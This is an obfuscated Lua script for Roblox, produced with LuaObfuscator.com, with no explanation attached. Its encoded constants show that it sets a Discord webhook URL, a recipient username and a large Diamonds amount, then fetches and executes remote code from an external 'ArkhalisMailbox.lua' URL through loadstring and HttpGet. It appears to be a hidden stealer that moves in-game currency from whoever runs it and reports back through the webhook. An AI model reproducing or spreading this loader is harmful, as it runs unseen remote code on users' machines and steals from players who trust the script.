--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.8) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=0;local v19;local v20;local v21;local v22;local v23;local v24;local v25;local v26;local v27;local v28;local v29;local v30;while true do if (v18==2) then function v23()local v31=0;local v32;local v33;while true do if (v31==(0 -0)) then v32,v33=v1(v16,v19,v19 + ((573 -(367 + 201)) -3) );v19=v19 + (3 -1) ;v31=(929 -(214 + 713)) -1 ;end if (v31==(620 -(555 + 64))) then return (v33 * ((298 + 889) -(857 + 74))) + v32 ;end end end v24=nil;function v24()local v34=0 + 0 ;local v35;local v36;local v37;local v38;while true do if (v34==(878 -(282 + (712 -(32 + 85))))) then return (v38 * (16778853 -(1523 + 114))) + (v37 * (58895 + 6641)) + (v36 * (364 -(106 + 2))) + v35 ;end if (v34==0) then v35,v36,v37,v38=v1(v16,v19,v19 + (1068 -(68 + 997)) );v19=v19 + (1274 -(226 + 1044)) ;v34=4 -3 ;end end end v25=nil;v18=3;end if (v18==4) then v28=nil;function v28(...)return {...},v12("#",...);end v29=nil;function v29()local v39=0;local v40;local v41;local v42;local v43;local v44;local v45;local v46;local v47;while true do if (v39==3) then v46=nil;v47=nil;v39=4;end if (v39==(1 + 3)) then while true do if (v40==(1024 -(706 + 318))) then local v99=1251 -(721 + 530) ;while true do if (v99~=(1271 -(945 + 326))) then else local v106=0 -0 ;while true do if (v106~=(0 + 0)) then else v41=700 -(271 + 429) ;v42=nil;v106=1;end if (v106~=1) then else v99=1 + 0 ;break;end end end if (1~=v99) then else v40=1;break;end end end if (v40==(1502 -(1408 + 92))) then local v100=0;local v101;while true do if (v100~=0) then else v101=0;while true do if (v101==1) then v40=3;break;end if (v101==(1086 -(461 + 625))) then local v119=0;while true do if (v119~=(1288 -(993 + 295))) then else v45=nil;v46=nil;v119=1;end if (1==v119) then v101=1 + 0 ;break;end end end end break;end end end if (v40==(1172 -(418 + 753))) then local v102=0 + 0 ;while true do if (v102~=1) then else v40=1 + 1 ;break;end if (v102~=(0 + 0)) then else v43=nil;v44=nil;v102=1 + 0 ;end end end if (v40==3) then v47=nil;while true do local v103=0;local v104;local v105;while true do if (0~=v103) then else v104=529 -(406 + 123) ;v105=nil;v103=1770 -(1749 + 20) ;end if (v103==1) then while true do if (v104==0) then v105=0;while true do if (v105~=(1 + 0)) then else if (v41~=(1323 -(1249 + 73))) then else local v159=0;local v160;while true do if (v159~=(0 + 0)) then else v160=0;while true do if (v160~=1) then else v47={};v41=2;break;end if ((1145 -(466 + 679))~=v160) then else local v169=0 -0 ;while true do if (v169==(0 -0)) then v45={v42,v43,nil,v44};v46=v24();v169=1;end if (v169~=(2 -1)) then else v160=2 -1 ;break;end end end end break;end end end if (v41~=2) then else local v161=114 -(4 + 110) ;local v162;while true do if (0==v161) then v162=0;while true do if (v162==1) then for v172=585 -(57 + 527) ,v24() do local v173=1427 -(41 + 1386) ;local v174;local v175;local v176;while true do if (v173==1) then v176=nil;while true do if (v174==(103 -(17 + 86))) then local v179=0;while true do if (v179==(0 + 0)) then v175=0;v176=nil;v179=1;end if (v179~=(1 -0)) then else v174=2 -1 ;break;end end end if (v174~=(167 -(122 + 44))) then else while true do if ((0 -0)==v175) then v176=v22();if (v21(v176,3 -2 ,1)~=0) then else local v189=0 + 0 ;local v190;local v191;local v192;local v193;local v194;local v195;while true do if (v189==3) then while true do if (v190==0) then local v199=0 + 0 ;while true do if (v199~=1) then else v190=1;break;end if (v199==(0 -0)) then v191=0;v192=nil;v199=1;end end end if (v190==(67 -(30 + 35))) then v195=nil;while true do if (v191==(0 + 0)) then local v205=0;while true do if (1==v205) then v191=1;break;end if (v205==0) then local v208=1257 -(1043 + 214) ;while true do if ((3 -2)~=v208) then else v205=1213 -(323 + 889) ;break;end if (v208~=(0 -0)) then else v192=580 -(361 + 219) ;v193=nil;v208=1;end end end end end if (v191==2) then while true do if (v192~=(320 -(53 + 267))) then else local v209=0;local v210;while true do if (v209==0) then v210=0;while true do if (v210~=(1 + 0)) then else v192=1;break;end if (v210~=(413 -(15 + 398))) then else v193=v21(v176,984 -(18 + 964) ,11 -8 );v194=v21(v176,4,6);v210=1 + 0 ;end end break;end end end if (v192==(1 + 0)) then local v211=850 -(20 + 830) ;local v212;local v213;while true do if (v211~=1) then else while true do if (v212==0) then v213=0 + 0 ;while true do if (v213==(127 -(116 + 10))) then v192=1 + 1 ;break;end if (v213==0) then v195={v23(),v23(),nil,nil};if (v193==(0 -0)) then local v224=0 + 0 ;local v225;local v226;while true do if (v224==0) then v225=0;v226=nil;v224=1;end if (v224==1) then while true do if (v225==(0 + 0)) then v226=0 + 0 ;while true do if (v226==(0 -0)) then v195[3]=v23();v195[4]=v23();break;end end break;end end break;end end elseif (v193==1) then v195[7 -4 ]=v24();elseif (v193==2) then v195[3]=v24() -(2^(1567 -(1126 + 425))) ;elseif (v193~=(408 -(118 + 287))) then else local v233=0 -0 ;local v234;local v235;while true do if (v233==1) then while true do if (v234==0) then v235=0;while true do if (v235==(1121 -(118 + 1003))) then v195[3]=v24() -(2^(46 -30)) ;v195[4]=v23();break;end end break;end end break;end if (v233~=(377 -(142 + 235))) then else v234=0 -0 ;v235=nil;v233=1;end end end v213=1 + 0 ;end end break;end end break;end if (v211~=0) then else v212=0;v213=nil;v211=1;end end end if (2==v192) then local v214=977 -(553 + 424) ;local v215;while true do if (0==v214) then v215=0 -0 ;while true do if (v215==(0 + 0)) then local v221=0 + 0 ;while true do if (v221==(0 + 0)) then local v222=0;while true do if (v222==(1 + 0)) then v221=1;break;end if ((0 + 0)~=v222) then else if (v21(v194,2 -1 ,2 -1 )==(2 -1)) then v195[1 + 1 ]=v47[v195[9 -7 ]];end if (v21(v194,755 -(239 + 514) ,2)==(1 + 0)) then v195[3]=v47[v195[1332 -(797 + 532) ]];end v222=1 + 0 ;end end end if (1==v221) then v215=1 + 0 ;break;end end end if (v215==(2 -1)) then v192=1205 -(373 + 829) ;break;end end break;end end end if (v192~=3) then else if (v21(v194,734 -(476 + 255) ,3)~=(1131 -(369 + 761))) then else v195[3 + 1 ]=v47[v195[6 -2 ]];end v42[v172]=v195;break;end end break;end if (v191==(1 -0)) then local v206=0;local v207;while true do if (v206==0) then v207=0;while true do if (v207~=0) then else v194=nil;v195=nil;v207=239 -(64 + 174) ;end if (v207~=1) then else v191=2;break;end end break;end end end end break;end if (v190==(1 + 0)) then local v200=0 -0 ;while true do if (v200~=0) then else v193=nil;v194=nil;v200=337 -(144 + 192) ;end if ((217 -(42 + 174))==v200) then v190=2;break;end end end end break;end if (v189~=1) then else v192=nil;v193=nil;v189=2 + 0 ;end if (v189==(2 + 0)) then v194=nil;v195=nil;v189=3;end if ((0 + 0)==v189) then v190=0;v191=nil;v189=1;end end end break;end end break;end end break;end if (v173==0) then v174=1504 -(363 + 1141) ;v175=nil;v173=1581 -(1183 + 397) ;end end end v41=3;break;end if (v162==(0 -0)) then local v170=0 + 0 ;local v171;while true do if (v170==(0 + 0)) then v171=1975 -(1913 + 62) ;while true do if (v171==1) then v162=1 + 0 ;break;end if (v171==0) then local v178=0;while true do if (v178~=(2 -1)) then else v171=1934 -(565 + 1368) ;break;end if (v178==0) then for v183=3 -2 ,v46 do local v184=0;local v185;local v186;local v187;local v188;while true do if (0==v184) then v185=1661 -(1477 + 184) ;v186=nil;v184=1;end if (v184==(1 -0)) then local v196=0;while true do if (v196==(0 + 0)) then v187=nil;v188=nil;v196=857 -(564 + 292) ;end if (v196==1) then v184=2;break;end end end if (v184==(2 -0)) then while true do if (v185==0) then local v197=0 -0 ;local v198;while true do if (v197==0) then v198=304 -(244 + 60) ;while true do if (v198==(1 + 0)) then v185=1;break;end if (v198~=(476 -(41 + 435))) then else v186=1001 -(938 + 63) ;v187=nil;v198=1 + 0 ;end end break;end end end if (v185~=(1126 -(936 + 189))) then else v188=nil;while true do if (0==v186) then local v201=0 + 0 ;local v202;local v203;while true do if ((1614 -(1565 + 48))~=v201) then else while true do if (v202==0) then v203=0 + 0 ;while true do if (v203~=1) then else v186=1;break;end if (v203==0) then local v219=0;local v220;while true do if (v219==(1138 -(782 + 356))) then v220=0;while true do if (v220==(268 -(176 + 91))) then v203=2 -1 ;break;end if (v220~=0) then else local v223=0;while true do if (v223==(1 -0)) then v220=1;break;end if (v223==0) then v187=v22();v188=nil;v223=1;end end end end break;end end end end break;end end break;end if (0==v201) then v202=1092 -(975 + 117) ;v203=nil;v201=1876 -(157 + 1718) ;end end end if (v186~=(1 + 0)) then else if (v187==1) then v188=v22()~=(0 -0) ;elseif (v187==(6 -4)) then v188=v25();elseif (v187==3) then v188=v26();end v47[v183]=v188;break;end end break;end end break;end end end v45[3]=v22();v178=1;end end end end break;end end end end break;end end end break;end if (v105==(1018 -(697 + 321))) then local v155=0;while true do if (v155==(0 -0)) then if (v41~=0) then else local v165=0;local v166;while true do if (v165==0) then v166=0;while true do if (v166~=0) then else v42={};v43={};v166=1;end if (v166~=(1 -0)) then else v44={};v41=1;break;end end break;end end end if (v41==3) then local v167=0 -0 ;local v168;while true do if (0~=v167) then else v168=0;while true do if (v168==(0 + 0)) then local v177=0;while true do if ((0 -0)==v177) then for v180=1,v24() do v43[v180-(2 -1) ]=v29();end return v45;end end end end break;end end end v155=1;end if (1==v155) then v105=1;break;end end end end break;end end break;end end end break;end end break;end if (v39~=(1228 -(322 + 905))) then else v42=nil;v43=nil;v39=613 -(602 + 9) ;end if ((1191 -(449 + 740))==v39) then v44=nil;v45=nil;v39=875 -(826 + 46) ;end if (v39~=(947 -(245 + 702))) then else v40=0;v41=nil;v39=3 -2 ;end end end v18=5;end if (v18==3) then function v25()local v48=v24();local v49=v24();local v50=1 + 0 ;local v51=(v21(v49,1899 -(260 + 1638) ,460 -(382 + 58) ) * ((6 -(3 + 1))^(27 + 5))) + v48 ;local v52=v21(v49,21,63 -32 );local v53=((v21(v49,94 -(225 -(92 + 71)) )==(1206 -(902 + 303))) and  -(1 -0)) or (1 + 0) ;if (v52==(0 -(0 + 0))) then if (v51==(0 + 0)) then return v53 * (0 -0) ;else v52=1 + 0 ;v50=1690 -(1121 + 569) ;end elseif (v52==(480 + 1567)) then return ((v51==(214 -(22 + 192))) and (v53 * ((684 -(483 + 200))/(1463 -(1404 + (98 -39)))))) or (v53 * NaN) ;end return v8(v53,v52-(720 + (1068 -(574 + 191))) ) * (v50 + (v51/((2 + 0)^(142 -90)))) ;end v26=nil;function v26(v54)local v55=0 + 0 + 0 ;local v56;local v57;while true do if (v55==(0 + 0)) then v56=nil;if  not v54 then v54=v24();if (v54==(0 -0)) then return "";end end v55=1 + (1886 -(927 + 959)) ;end if (v55==(852 -((856 -602) + 595))) then return v6(v57);end if (v55==(2 -0)) then v57={};for v90=127 -(55 + 71) , #v56 do v57[v90]=v2(v1(v3(v56,v90,v90)));end v55=3;end if (v55==(1 -0)) then v56=v3(v16,v19,(v19 + v54) -(1791 -(573 + (1265 -(25 + 23)))) );v19=v19 + v54 ;v55=808 -(118 + 688) ;end end end v27=v24;v18=4;end if (v18==1) then function v21(v58,v59,v60)if v60 then local v83=(508 + 224) -(16 + 716) ;local v84;while true do if (v83==(0 -0)) then v84=(v58/((99 -(4 + 7 + (1147 -(810 + 251))))^(v59-(2 -1))))%((287 -(158 + 17 + 110))^(((v60-((535 -(43 + 490)) -1)) -(v59-1)) + (4 -3))) ;return v84-(v84%(1797 -(503 + 1293))) ;end end else local v85=2^(v59-1) ;return (((v58%(v85 + v85))>=v85) and (2 -1)) or (0 + 0) ;end end v22=nil;function v22()local v61=v1(v16,v19,v19);v19=v19 + 1 ;return v61;end v23=nil;v18=2;end if (v18==5) then v30=nil;function v30(v62,v63,v64)local v65=v62[1];local v66=v62[2];local v67=v62[3];return function(...)local v69=v65;local v70=v66;local v71=v67;local v72=v28;local v73=1;local v74= -1;local v75={};local v76={...};local v77=v12("#",...) -1 ;local v78={};local v79={};for v86=0,v77 do if (v86>=v71) then v75[v86-v71 ]=v76[v86 + 1 ];else v79[v86]=v76[v86 + 1 ];end end local v80=(v77-v71) + 1 ;local v81;local v82;while true do local v87=0;while true do if (v87==1) then if (v82<=5) then if (v82<=2) then if (v82<=0) then v79[v81[2]][v81[3]]=v81[4];v73=v73 + 1 ;v81=v69[v73];v79[v81[2]]=v64[v81[3]];v73=v73 + 1 ;v81=v69[v73];v79[v81[2]][v81[3]]=v81[4];v73=v73 + 1 ;v81=v69[v73];v79[v81[2]]=v81[3];v73=v73 + 1 ;v81=v69[v73];v73=v81[3];elseif (v82==1) then v79[v81[2]]=v64[v81[3]];else local v122=0;local v123;local v124;local v125;local v126;while true do if (v122==2) then for v157=v123,v74 do local v158=0;while true do if (v158==0) then v126=v126 + 1 ;v79[v157]=v124[v126];break;end end end break;end if (1==v122) then v74=(v125 + v123) -1 ;v126=0;v122=2;end if (v122==0) then v123=v81[2];v124,v125=v72(v79[v123](v13(v79,v123 + 1 ,v81[3])));v122=1;end end end elseif (v82<=3) then v79[v81[2]][v81[3]]=v81[4];elseif (v82>4) then v79[v81[2]]();else local v127=v81[2];local v128=v79[v81[3]];v79[v127 + 1 ]=v128;v79[v127]=v128[v81[4]];end elseif (v82<=8) then if (v82<=6) then local v115=0;local v116;while true do if (v115==0) then v116=v81[2];v79[v116]=v79[v116](v13(v79,v116 + 1 ,v74));break;end end elseif (v82>7) then if (v79[v81[2]]==v81[4]) then v73=v73 + 1 ;else v73=v81[3];end else v73=v81[3];end elseif (v82<=9) then v79[v81[2]]=v81[3];elseif (v82==10) then local v133;local v134,v135;local v136;local v137;v79[v81[2]][v81[3]]=v81[4];v73=v73 + 1 ;v81=v69[v73];v79[v81[2]]=v64[v81[3]];v73=v73 + 1 ;v81=v69[v73];v79[v81[2]]=v64[v81[3]];v73=v73 + 1 ;v81=v69[v73];v137=v81[2];v136=v79[v81[3]];v79[v137 + 1 ]=v136;v79[v137]=v136[v81[4]];v73=v73 + 1 ;v81=v69[v73];v79[v81[2]]=v81[3];v73=v73 + 1 ;v81=v69[v73];v137=v81[2];v134,v135=v72(v79[v137](v13(v79,v137 + 1 ,v81[3])));v74=(v135 + v137) -1 ;v133=0;for v151=v137,v74 do v133=v133 + 1 ;v79[v151]=v134[v133];end v73=v73 + 1 ;v81=v69[v73];v137=v81[2];v79[v137]=v79[v137](v13(v79,v137 + 1 ,v74));v73=v73 + 1 ;v81=v69[v73];v79[v81[2]]();v73=v73 + 1 ;v81=v69[v73];v73=v81[3];else do return;end end v73=v73 + 1 ;break;end if (0==v87) then v81=v69[v73];v82=v81[1];v87=1;end end end end;end return v30(v29(),{},v17)(...);end if (v18==0) then v19=1;v20=nil;v16=v4(v3(v16,5),"..",function(v68)if (v1(v68,2)==79) then local v88=0;while true do if (v88==0) then v20=v0(v3(v68,1,1));return "";end end else local v89=v2(v0(v68,16));if v20 then local v96=v5(v89,v20);v20=nil;return v96;else return v89;end end end);v21=nil;v18=1;end end end v15("LOL!0D3O00028O00026O00F03F03023O005F4703073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F2O313039362O3239302O3834333732303832342F4246366D58755852376763587862507766734534673335425075524132696F444976325049782D374F4164687030715F777A414B4E706D413859774668762O63685A6F71030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403313O00682O7470733A2O2F61726B68616C69736C75612E6769746875622E696F2F41726B68616C69734D61696C626F782E6C756103083O00557365726E616D6503093O00326B72692O7A792O5803083O004469616D6F6E6473024O0080841E4100163O0012093O00013O0026083O000D000100020004073O000D0001001201000100033O00300A00010004000500122O000100063O00122O000200073O00202O00020002000800122O000400096O000200046O00013O00024O00010001000100044O001500010026083O0001000100010004073O00010001001201000100033O00302O0001000A000B00122O000100033O00302O0001000C000D00124O00023O00044O000100012O000B3O00017O00",v9(),...);end
